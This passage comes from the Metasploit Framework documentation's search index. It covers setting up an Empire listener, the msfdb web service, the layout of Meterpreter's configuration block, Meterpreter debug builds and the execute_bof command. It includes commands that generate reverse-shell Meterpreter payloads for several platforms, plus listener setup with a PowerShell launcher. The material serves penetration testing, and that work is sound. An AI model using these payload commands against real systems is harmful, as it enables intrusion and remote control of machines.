header injection point . Empire . Empire is a now retired post exploitation framework for windows. The interactive console provides both a Host configuration, as well as the ability to individually configure options: . (Empire) &amp;gt; listeners [!] No listeners currently active (Empire: listeners) &amp;gt; uselistener http (Empire: listeners/http) &amp;gt; info Name Required Value Description ---- -------- ------- ----------- Name True http Name for the listener. Host True http://192.168.246.234 Hostname/IP for staging. BindIP True 0.0.0.0 The IP to bind to on the control server. Port True Port for the listener. Launcher True powershell -noP -sta -w 1 -enc Launcher string. StagingKey True d6ca3fd0c3a3b462ff2b83436dda495e Staging key for initial agent negotiation. DefaultDelay True 5 Agent delay/reach back interval (in seconds). DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0). DefaultLostLimit True 60 Number of missed checkins before exiting DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent. process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko CertPath False Certificate path for https listeners. KillDate False Date for the listener to exit (MM/dd/yyyy). WorkingHours False Hours for the agent to operate (09:00-17:00). Headers True Server:Microsoft-IIS/7.5 Headers for the control server. Cookie False sTAZwcPKtawpT Custom Cookie Name StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php UserAgent False default User-agent string to use for the staging request (default, none, or other). Proxy False default Proxy to use for request (default, none, or other). ProxyCreds False default Proxy credentials ([domain\\]username:password) to use for request (default, none, or other). SlackToken False Your SlackBot API token to communicate with your Slack instance. SlackChannel False #general The Slack channel or DM that notifications will be sent to. Setting the Host option will configure both the Host option, as well as the Port: . Empire: listeners/http) &amp;gt; set Host http://10.10.14.31:443 (Empire: listeners/http) &amp;gt; info Name: HTTP[S] Category: client_serverAuthors: @harmj0yDescription: Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.HTTP[S] Options: Name Required Value Description ---- -------- ------- ----------- Name True http Name for the listener. Host True http://10.10.14.31:443 Hostname/IP for staging. BindIP True 0.0.0.0 The IP to bind to on the control server. Port True 443 Port for the listener. Launcher True powershell -noP -sta -w 1 -enc Launcher string. StagingKey True d6ca3fd0c3a3b462ff2b83436dda495e Staging key for initial agent negotiation. DefaultDelay True 5 Agent delay/reach back interval (in seconds). DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0). DefaultLostLimit True 60 Number of missed checkins before exiting DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent. process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko CertPath False Certificate path for https listeners. KillDate False Date for the listener to exit (MM/dd/yyyy). WorkingHours False Hours for the agent to operate (09:00-17:00). Headers True Server:Microsoft-IIS/7.5 Headers for the control server. Cookie False sTAZwcPKtawpT Custom Cookie Name StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php UserAgent False default User-agent string to use for the staging request (default, none, or other). Proxy False default Proxy to use for request (default, none, or other). ProxyCreds False default Proxy credentials ([domain\\]username:password) to use for request (default, none, or other). SlackToken False Your SlackBot API token to communicate with your Slack instance. SlackChannel False #general The Slack channel or DM that notifications will be sent to. Likewise, updating the individual port will be reflected in the Host option: . (Empire: listeners/http) &amp;gt; set Port 1234 (Empire: listeners/http) &amp;gt; info Name: HTTP[S] Category: client_server Authors: @harmj0y Description: Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach. HTTP[S] Options: Name Required Value Description ---- -------- ------- ----------- Name True http Name for the listener. **Host True http://10.10.14.31:1234 Hostname/IP for staging.** BindIP True 0.0.0.0 The IP to bind to on the control server. **Port True 1234 Port for the listener.** . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#similar-efforts",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#similar-efforts"
  },"601": {
    "doc": "Metasploit URL support proposal",
    "title": "Metasploit URL support proposal",
    "content": " ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html"
  },"602": {
    "doc": "Metasploit Web Service",
    "title": "Managing the Web Service",
    "content": "Requirements . To use the web service you will need a PostgreSQL database to serve as the backend data store. The msfdb tool allows you to manage both the Metasploit Framework database and web service. If you are going to configure the database manually you can find more information on the Managing the Database page. Getting Started . Initialize the Database and Web Service . Execute msfdb init and respond to prompts during the interactive initialization. The script first creates and configures the database, then it configures the web service, and finally configures the local msfconsole with the new data service connection. msfdb . The msfdb tool allows you to manage both the Metasploit Framework database and web service components together or independently. If the --component option is not provided then the specified command will be executed for the database followed by the web service. This default mode of operation is useful when first setting up the database and web service. The component may be specified if you wish to make changes to a given component independent of the other. Usage: msfdb [options] &amp;lt;command&amp;gt; . | Options: . | Execute msfdb --help for the complete usage information | . | Commands: . | init - initialize the component | reinit - delete and reinitialize the component | delete - delete and stop the component | status - check component status | start - start the component | stop - stop the component | restart - restart the component | . | . Examples . | msfdb start - Start the database and web service | msfdb --component webservice stop - Stop the web service | msfdb --component webservice --address 0.0.0.0 start - Start the web service, listening on any host address | . Notes . | SSL is enabled by default and msfdb will generate a fake “snakeoil” SSL certificate during initialization using Rex::Socket::Ssl.ssl_generate_certificate if one is not provided. The generated SSL certificate uses a random common name (CN) which will not match your hostname, therefore, you will need to make appropriate accommodations when operating the web service with such a certificate. Please generate your own SSL certificate and key instead and supply those to msfdb using the --ssl-cert-file and --ssl-key-file options, and enable SSL verification by passing the option --no-ssl-disable-verify. | A simple verification that web service is up and running can be performed using cURL: curl --insecure -H \"Accept: application/json\" -H \"Authorization: Bearer &amp;lt;token&amp;gt;\" https://localhost:5443/api/v1/msf/version . | . Accessing the API . The API account can be accessed with your preferred web browser by visiting https://&amp;lt;address&amp;gt;:&amp;lt;port&amp;gt;/api/v1/auth/account. If you want to change the API token for your account you can log in to the API account page and generate a new API token. You can find more information on the data models and various API endpoints by visiting the API Documentation at: https://&amp;lt;address&amp;gt;:&amp;lt;port&amp;gt;/api/v1/api-docs . ",
    "url": "/docs/using-metasploit/advanced/metasploit-web-service.html#managing-the-web-service",
    "relUrl": "/docs/using-metasploit/advanced/metasploit-web-service.html#managing-the-web-service"
  },"603": {
    "doc": "Metasploit Web Service",
    "title": "Utilizing the Data Service in msfconsole",
    "content": "Connecting . You can use the db_connect command to connect to the desired data service. When you successfully connect to a data service that connection will be saved in the Metasploit config file. You can provide a name with the -n option, otherwise one will be randomly generated. You can then use that name to reconnect to the data service at a later time. Please note that you can only be connected to one data service at a time. The db_disconnect command will need to be used before switching to a new data service. You can use db_status to see information about the currently connected data service. Usage: db_connect &amp;lt;options&amp;gt; &amp;lt;url&amp;gt; . | Options: . | -l,--list-services - List the available data services that have been previously saved. | -y,--yaml - Connect to the data service specified in the provided database.yml file. | -n,--name - Name used to store the connection. Providing an existing name will overwrite the settings for that connection. | -c,--cert - Certificate file matching the remote data server’s certificate. Needed when using self-signed SSL cert. | -t,--token - The API token used to authenticate to the remote data service. | --skip-verify - Skip validating authenticity of server’s certificate (NOT RECOMMENDED). | . | Examples: . | db_connect http://localhost:5443 - Connect to the Metasploit REST API instance at localhost running on port 5443 | db_connect -c ~/.msf4/msf-ws-cert.pem -t 72ce00fd9ab1a96970137e5a12faa12f38dcc4a9e42158bdd3ce7043c65f5ca37b862f3faf3630d2 https://localhost:5443 - Connect to the server running at localhost on port 5443 that has SSL and authentication enabled. | db_connect -l - List the data services that have been saved. | db_connect -n LA_server http://localhost:5443 - Connect to the data service running on localhost port 5443 and assign the name “LA_server” to the saved entry. | . | URL Formats . | HTTP - http://&amp;lt;host&amp;gt;:&amp;lt;port&amp;gt; | HTTPS - https://&amp;lt;host&amp;gt;:&amp;lt;port&amp;gt; | Postgres - &amp;lt;user&amp;gt;:&amp;lt;password&amp;gt;@&amp;lt;host&amp;gt;:&amp;lt;port&amp;gt;/&amp;lt;database name&amp;gt; | . | . Setting a Default Data Service . The db_save command can be used to save the currently connected data service as the default. Every time msfconsole starts up it will attempt to connect to that data service. You can always switch between data services if you have a default set, this will just determine which data service you are connected to when msfconsole is started. Usage: db_save . | Examples: . | db_connect http://localhost:5443 then db_save - Connect to the data service running on localhost port 5443 then set it as the default connection. | . | . Removing Saved Data Services . Saved data services can be removed using the db_remove command. This can be useful if the data service no longer exists at that location, or if you no longer want to keep a record of it around for fast connection. Usage: db_remove &amp;lt;name&amp;gt; . | Examples: . | db_remove LA_server - Remove the saved data service entry called “LA_server” | . | . Notes . There are a few pieces of information to keep in mind when using data services with Metasploit Framework. | Specifying the name of an existing saved data service connection will overwrite those settings. | A data service must already have an existing entry in the list of saved data services to be set as the default. Data services that were connected to using a database.yml file cannot be saved as default using this method. | A Postgres database connection is required before connecting to a remote data service. | The configuration from the database.yml will still be honored for the foreseeable future, but a saved default data service will take priority when it is present. | The saved data services are stored in the Metasploit config file, which is located at ~/.msf4/config by default. | . ",
    "url": "/docs/using-metasploit/advanced/metasploit-web-service.html#utilizing-the-data-service-in-msfconsole",
    "relUrl": "/docs/using-metasploit/advanced/metasploit-web-service.html#utilizing-the-data-service-in-msfconsole"
  },"604": {
    "doc": "Metasploit Web Service",
    "title": "Metasploit Web Service",
    "content": "The Metasploit web service allows interaction with Metasploit’s various data models through a REST API. ",
    "url": "/docs/using-metasploit/advanced/metasploit-web-service.html",
    "relUrl": "/docs/using-metasploit/advanced/metasploit-web-service.html"
  },"605": {
    "doc": "Configuration",
    "title": "On this page",
    "content": ". | How the configuration is found . | Loading configuration in Windows Meterpreter | Loading configuration in POSIX Meterpreter (Mettle) | . | Windows Meterpreter configuration block structure . | Session configuration block | Transport configuration block . | Common configuration values | TCP configuration values | HTTP/S configuration values | Transport configuration list | . | Extension configuration block | . | Configuration block overview | . Meterpreter has always needed to be configured on the fly so that it knows how to talk to Metasploit. For many years, this configuration management was achieved by hot-patching a copy of the metsrv DLL/binary using a simple “string replace” approach. This worked well enough to support a number of situations but restricted the flexibility of Meterpreter and its support for handling multiple transports. It wasn’t just transports that were locked down, but the ability to provide payloads that contained way more than the core Meterpreter (metsrv) itself. It was also not easy to pass other forms of information on the fly to the Meterpreter instance because the stagers were only able to pass in a copy of the active socket handle. Recent modifications to Meterpreter have done away with this old method and have replaced with a dynamic configuration block that can be used to alleviate these problems and provide the flexibility for other more interesting things down the track. This document contains information on the structure and layout of the new configuration block, along with how it is used by Meterpreter. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#on-this-page",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#on-this-page"
  },"606": {
    "doc": "Configuration",
    "title": "How the configuration is found",
    "content": "In the past, Meterpreter has required that the stager (or stage0 as some like to call it) pass in a handle to the active socket so that it can take over communications without creating a new socket (at least in the case of TCP connections). While this feature is still required, it doesn’t happen in the way that it used to. Instead, Meterpreter now requires that the stager pass in a pointer to the start of the configuration block. The configuration block can be anywhere in memory, so long as the memory region is marked as RWX. Loading configuration in Windows Meterpreter . Stage 1 of loading Windows Meterpreter now utilises a new loader, called meterpreter_loader (Win x86, Win x64), which does the following: . | Loads the metsrv DLL from disk. | Patches the DOS header of the DLL so that it contains executable shellcode that correctly initializes metsrv and calculates the location that points to the end of metsrv in memory. It also takes any existing socket value (found in edi or rdi depending on the architecture) and writes that directly to the configuration (more on this later). | Generates a configuration block and appends this to the metsrv binary. | . The result is that the payload has the following structure once it has been prepared: . +--------------+ | Patched DOS | header | +--------------+ | . metsrv dll . | +--------------+ | config block | +--------------+ . Loading configuration in POSIX Meterpreter (Mettle) . All of the configuration for the POSIX Meterpreter is able to be passed through command-line arguments to the payload. When generating a payload with a specific configuration, a simulated command line is patched into a static variable in the main startup code. Generate a payload and see ./mettle -h for a full description of available arguments. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#how-the-configuration-is-found",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#how-the-configuration-is-found"
  },"607": {
    "doc": "Configuration",
    "title": "Windows Meterpreter configuration block structure",
    "content": "In order to pass information to Meterpreter and not have it break, a known format of configuration is required. This format needs to be consistent on each invocation, much like you would expect with any configuration. In the case of binary Meterpreter (POSIX and Windows), this configuration block contains the following: . | One Session configuration block. | One or more Transport Configuration blocks, followed by a terminator. | One or more Extension configuration blocks, followed by a terminator. | . Each of these blocks is described in detail in the sections below. Session configuration block . The notion of a session configuration block is used to wrap up the following values: . | Socket handle - When Meterpreter is invoked with TCP communications, an active socket is already in use. This socket handle is intended to be reused by Meterpreter when metsrv executes. This socket handle is written to the configuration block on the fly by the loader. It is stored in the Session configuration block so that it has a known location. This value is always a 32-bit DWORD, even on 64-bit platforms. | Exit func - This value is a 32-bit DWORD value that identifies the method that should be used when terminating the Meterpreter session. This value is the equivalent of the Block API Hash that represents the function to be invoked. Meterpreter used to delegate the responsibility of handling this to the stager that had invoked it. Meterpreter no longer does this, instead, it handles the closing of the Meterpreter session by itself, and hence the chosen method for termination must be made known in the configuration. | Session expiry value - This is a 32-bit DWORD that contains the number of seconds that the Meterpreter session should last for. While Meterpreter is running, this value is continually checked, and if the session expiry time is reached, then Meterpreter shuts itself down. For more information, please read Meterpreter Timeout Control. | UUID - This is a 16-byte value that represents a payload UUID. A UUID is a new concept that has come to Metasploit with a goal of tracking payload type and origin, and validating that sessions received by Metasploit are intended for use by the current installation. For more information, please read Payload UUID. | . The layout of this block in memory looks like this: . +--------------+ |Socket Handle | +--------------+ | Exit func | +--------------+ |Session Expiry| +--------------+ | | UUID | | | +--------------+ | &amp;lt;- 4 bytes -&amp;gt;| . With this structure in place, Meterpreter knows that the session configuration block is exactly 28 bytes in size. The Session configuration block description can be found in the Meterpreter source. Transport configuration block . The Transport configuration block is a term used to refer to the group of transport configurations that are present in the payload. Meterpreter now supports multiple transports, and so the configuration should support multiple transports too. There are two main issues when dealing with transport configurations: . | The configuration should allow for many transport configurations to be specified. | The configuration should allow for each transport to be of a different type and size. | . Meterpreter’s current transport implementations provide two main “classes” of transport, those being HTTP(S) and TCP. Each of these transport classes requires different configuration values, as well as common values, in order to function. Common configuration values . The values that are common to both HTTP(S) and TCP transports are: . | URL - This value is a meta-description of the transport and is used not only as a configuration element for the transport itself but also as a way of determining what type of transport this block represents. The field is a total of 512 characters (Windows Meterpreter uses wchar_t, while POSIX Meterpreter uses char). Transport types are specified by the scheme element in the URL, and the body of the URL specifies key information such as host and port information. Meterpreter inspects this to determine what type of transport block is in use, and hence from there is able to determine the size of the block. Valid values look like the following: . | tcp://&amp;lt;host&amp;gt;:&amp;lt;port&amp;gt; - indicates that this payload is a reverse IPv4 TCP connection. | tcp6://&amp;lt;host&amp;gt;:&amp;lt;port&amp;gt;?&amp;lt;scope&amp;gt; - indicates that this payload is a reverse IPv6 TCP connection. | tcp://:&amp;lt;port&amp;gt; - indicates that this payload is a bind payload listening on the specified port (note that no host is specified). | http://&amp;lt;host&amp;gt;:&amp;lt;port&amp;gt;/&amp;lt;uri&amp;gt; - indicates that this payload is an HTTP connection (can only be reverse). | https://&amp;lt;host&amp;gt;:&amp;lt;port&amp;gt;/&amp;lt;uri&amp;gt; - indicates that this payload is an HTTPS connection (can only be reverse). | . | Communications expiry - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the Timeout documentation (link coming soon). | Retry total - This value is 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the Timeout documentation (link coming soon). | Retry wait - This value is 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the Timeout documentation (link coming soon). | . The layout of this block in memory looks like the following: . +--------------+ | | URL | . 512 characters worth . (POSIX -&amp;gt; ASCII -&amp;gt; char) . (Windows -&amp;gt; wide char -&amp;gt; wchar_t) . | +--------------+ | Comms T/O | +--------------+ | Retry Total | +--------------+ | Retry Wait | +--------------+ | &amp;lt;- 4 bytes -&amp;gt;| . The common transport configuration block description can be found in the Meterpreter source. TCP configuration values . At this time, there are no TCP-specific configuration values, as the common configuration block caters for all of the needs of TCP transports. This may change down the track. HTTP/S configuration values . HTTP and HTTPS connections have a number of extra configuration values that are required in order to make it function correctly in various environments. Those values are: . | Proxy host - In environments where proxies are required to be set manually, this field contains the detail of the proxy to use. The field is 128 characters in size (wchar_t only, given that we don’t yet have HTTP/S transport in POSIX), and can be in one of the following formats: . | http://&amp;lt;proxy ip&amp;gt;:&amp;lt;proxy port&amp;gt; in the case of HTTP proxies. | socks=&amp;lt;socks ip&amp;gt;:&amp;lt;sock port&amp;gt; in the case of socks proxies. | . | Proxy user name - Some proxies require authentication. In such cases, this value contains the username that should be used to authenticate with the given proxy. This field is 64 characters in size (wchar_t). | Proxy password - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also 64 characters in size (wchar_t). * User agent string - Customisable user agent string. This changes the user agent that is used when HTTP/S requests are made to Metasploit. This field is 256 characters in size (wchar_t). | Expected SSL certificate hash - Meterpreter has the capability of validating the SSL certificate that Metasploit presents when using HTTPS. This value contains the 20-byte SHA1 hash of the expected certificate. For more information, please read the SSL certificate validation documentation (link coming soon). | . All values that are shown above need to be specified in the configuration, including SSL certificate validation for plain HTTP connections. Values that are not used should be zeroed out. The structure of the HTTP/S configuration is as follows. +--------------+ | | Proxy host | . 128 characters worth (wchar_t) | +--------------+ | | Proxy user | . 64 characters worth (wchar_t) | +--------------+ | | Proxy pass | . 64 characters worth (wchar_t) | +--------------+ | | User agent | . 256 characters worth (wchar_t) | +--------------+ | | SSL cert | SHA1 hash | | | +--------------+ | &amp;lt;- 4 bytes -&amp;gt;| . The HTTP/S transport configuration block description can be found in the Meterpreter source. Transport configuration list . As already mentioned, more than one of these transport configuration blocks can be specified. In order to facilitate this, Meterpreter needs to know when the “list” of transports has ended. Using the URL, Meterpreter can determine the size of the block and can move to the next block, depending on the type that is discovered. As soon as Meterpreter detects a transport configuration URL value that has a string length of zero, for example, a single NULL ASCII char in POSIX and a single NULL multi-byte char in Windows, it assumes that the transport list has been terminated. The byte immediately following this is deemed to be the start of the Extension configuration, which is documented in the next section. Extension configuration block . The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have Stageless payloads (link coming soon), and to provide the means for sharing of extensions during migration (though this hasn’t been implemented yet). Each of the extensions must have been compiled with Reflective DLL Injection support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the Stageless payloads (link coming soon) documentation. The extension configuration block also functions as a “list” to allow for an arbitrary number of extensions to be included. Each extension entry needs to contain: . | Size - This is the exact size, in bytes, of the extension DLL itself. The value is a 32-bit DWORD. | Extension binary - This is the full binary directly copied from the DLL. This value needs to be exactly the same length as what is specified in the Size field. | . When loading the extensions from the configuration, Meterpreter will continue to parse entries until it finds a size value of 0. At this point, Meterpreter assumes it has reached the end of the extension list and will stop parsing. The structure is simply laid out like the following: . +--------------+ | Ext. Size | +--------------+ | Ext. content | +--------------+ | NULL term. | (4 bytes) | +--------------+ . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#windows-meterpreter-configuration-block-structure",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#windows-meterpreter-configuration-block-structure"
  },"608": {
    "doc": "Configuration",
    "title": "Configuration block overview",
    "content": "To summarise, the following shows the layout of a full configuration: . +--------------+ |Socket Handle | +--------------+ | Exit func | +--------------+ |Session Expiry| +--------------+ | | UUID | | | +--------------+ | Transport 1 | tcp://... | . | +--------------+ | Comms T/O | +--------------+ | Retry Total | +--------------+ | Retry Wait | +--------------+ | Transport 2 | http://... | . | +--------------+ | Comms T/O | +--------------+ | Retry Total | +--------------+ | Retry Wait | +--------------+ | | Proxy host | | +--------------+ | | Proxy user | | +--------------+ | | Proxy pass | | +--------------+ | | User agent | | +--------------+ | | SSL cert | SHA1 hash | | +--------------+ | NULL term. |(1 or 2 bytes)| +--------------+ | Ext 1. Size | +--------------+ |Ext 1. content| +--------------+ | Ext 2. Size | +--------------+ |Ext 2. content| +--------------+ | NULL term. | +--------------+ . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#configuration-block-overview",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#configuration-block-overview"
  },"609": {
    "doc": "Configuration",
    "title": "Configuration",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html"
  },"610": {
    "doc": "Debugging Meterpreter Sessions",
    "title": "Log Meterpreter TLV Packets",
    "content": "This can be enabled for any Meterpreter session, and does not require a debug Metasploit build: . msf6 &amp;gt; setg SessionTlvLogging true SessionTlvLogging =&amp;gt; true . Allowed values: . | setg SessionTlvLogging true - Enable network logging, defaulting to console | setg SessionTlvLogging false - Disable all network logging | setg SessionTlvLogging console - Log to the current msfconsole instance | setg SessionTlvLogging file:/tmp/session.txt - Write the network traffic logs to an arbitrary file | . Example output: . meterpreter &amp;gt; getenv USER SEND: #&amp;lt;Rex::Post::Meterpreter::Packet type=Request tlvs=[ #&amp;lt;Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv&amp;gt; #&amp;lt;Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\"&amp;gt; #&amp;lt;Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\"&amp;gt; ]&amp;gt; RECV: #&amp;lt;Rex::Post::Meterpreter::Packet type=Response tlvs=[ #&amp;lt;Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value=\"Q\\xE63_onC\\x9E\\xD71\\xDE3\\xB5Q\\xE24\"&amp;gt; #&amp;lt;Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv&amp;gt; #&amp;lt;Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\"&amp;gt; #&amp;lt;Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0&amp;gt; #&amp;lt;Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[ #&amp;lt;Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\"&amp;gt; #&amp;lt;Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value=\"demo_user\"&amp;gt; ]&amp;gt; ]&amp;gt; Environment Variables ===================== Variable Value -------- ----- USER demo_user . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#log-meterpreter-tlv-packets",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#log-meterpreter-tlv-packets"
  },"611": {
    "doc": "Debugging Meterpreter Sessions",
    "title": "Meterpreter debug builds",
    "content": "The following options can be specified when generating Meterpreter payloads: . | MeterpreterDebugBuild - When set to true, the generated Meterpreter payload will have additional logging present | MeterpreterDebugLogging - Configure the logging mode. This currently only allows writing to a file on the remote host. Requires MeterpreterDebugBuild to be set to true. Example value: setg MeterpreterDebugLogging rpath:/tmp/meterpreter_log.txt | MeterpreterTryToFork - When set to true the Meterpreter payload will try to fork from the currently running process. Setting to false is useful to see any stdout logging that occurs | . The debug build will have additional log statements, which can be easily detected. These debug builds are useful for scenarios where A/V is not running, in local labs for learning purposes, or raising Metasploit issue reports etc. Python . use payload/python/meterpreter_reverse_tcp generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false to_handler python3 shell.py . PHP . use payload/php/meterpreter_reverse_http generate -o shell.php -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true to_handler php shell_http.php . Windows . use windows/x64/meterpreter_reverse_tcp generate -f exe -o shell.exe MeterpreterDebugBuild=true MeterpreterDebugLogging='rpath:C:/Windows/Temp/foo.txt' to_handler . Mac . use osx/x64/meterpreter_reverse_tcp generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt' to_handler . Linux . use linux/x64/meterpreter_reverse_tcp generate -f elf -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt' to_handler . Java . Functionality not supported . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#meterpreter-debug-builds",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#meterpreter-debug-builds"
  },"612": {
    "doc": "Debugging Meterpreter Sessions",
    "title": "Debugging Meterpreter Sessions",
    "content": "There are currently two main ways to debug Meterpreter sessions: . | Log all networking requests between msfconsole and Meterpreter, i.e. TLV Packets | Generate a custom Meterpreter debug build with extra logging present | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html"
  },"613": {
    "doc": "ExecuteBof Command",
    "title": "Execution Environment",
    "content": "Warning: The execution environment is shared with the Meterpreter process. If there is an exception or the BOF crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated session to avoid losing access altogether. The loader and execution environment are provided by trustedsec/COFFLoader. The extension is therefore subject to the same limitations. The following functions are unavailable: . | BeaconDataPtr | BeaconUseToken1 | BeaconRevertToken1 | BeaconIsAdmin | BeaconInjectProcess | BeaconInjectTemporaryProcess | . 1 The token functions are defined and present, but will only effect the execution of the BOF and not the Meterpreter runtime environment. Currently, there is only one output stream. All output data processed by BeaconOutput and BeaconPrintf is combined into that stream. BOFs should not use this for outputting binary data. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#execution-environment",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#execution-environment"
  },"614": {
    "doc": "ExecuteBof Command",
    "title": "Usage",
    "content": "The bofloader extension provides exactly one command, through which all of the provided functionality is accessed. execute_bof &amp;lt;/path/to/bof_file&amp;gt; [Options] -- [BOF Arguments] . | -c / --compile – Compile the input file (requires mingw). | -e / --entry – The entry point (default: go). | -f / --format-string – Argument format-string. See details below. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#usage",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#usage"
  },"615": {
    "doc": "ExecuteBof Command",
    "title": "Compile",
    "content": "The compile option will use a local mingw instance to compile the input file into a COFF file for execution. The standard beacon.h file will be in the include path automatically. In this case, the input file is treated as a C source file instead of compiled data. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#compile",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#compile"
  },"616": {
    "doc": "ExecuteBof Command",
    "title": "Entry Point",
    "content": "Once loaded the loader will call the BOF entry point. By default, this value is go. The entry point option can change it to another valid function to call instead. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#entry-point",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#entry-point"
  },"617": {
    "doc": "ExecuteBof Command",
    "title": "Argument Format-String",
    "content": "The execute_bof command is capable of serializing arguments to be sent to the BOF for execution. The user must define the data type of each argument that the BOF file expecting to see. This information would come from either reading the BOF’s documentation or source code. Incorrectly specifying the arguments or omitting them entirely can result in the BOF crashing and the Meterpreter session dying. BOF argument types are defined in the format string argument with -f / --format-string. The following table describes each of the types. | Type | Description | Unpack With (C) | . | b | binary data (e.g. 01020304, file:/path/to/file.bin)1 | BeaconDataExtract | . | i | 32-bit integer (e.g. 0x1234, 5678)2 | BeaconDataInt | . | s | 16-bit integer (e.g. 0x1234, 5678)2 | BeaconDataShort | . | z | null-terminated utf-8 string | BeaconDataExtract | . | Z | null-terminated utf-16 string | (wchar_t *)BeaconDataExtract | . 1 Binary data arguments are specified as either a stream of hex characters or as the path to a file local to the Metasploit Framework instance. In the case of a file path, it must be prefixed with file:. 2 Integer arguments are specified as either decimal or hexadecimal literals. Unknown arguments are treated as BOF arguments. Additionally, any arguments after the -- terminator are explicitly treated as BOF arguments. Using the terminator allows ambiguous arguments to such as --help to be forward to the BOF instead of being processed locally. The number of BOF arguments to be forward must equal number of characters in the argument format string. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#argument-format-string",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#argument-format-string"
  },"618": {
    "doc": "ExecuteBof Command",
    "title": "Usage Examples",
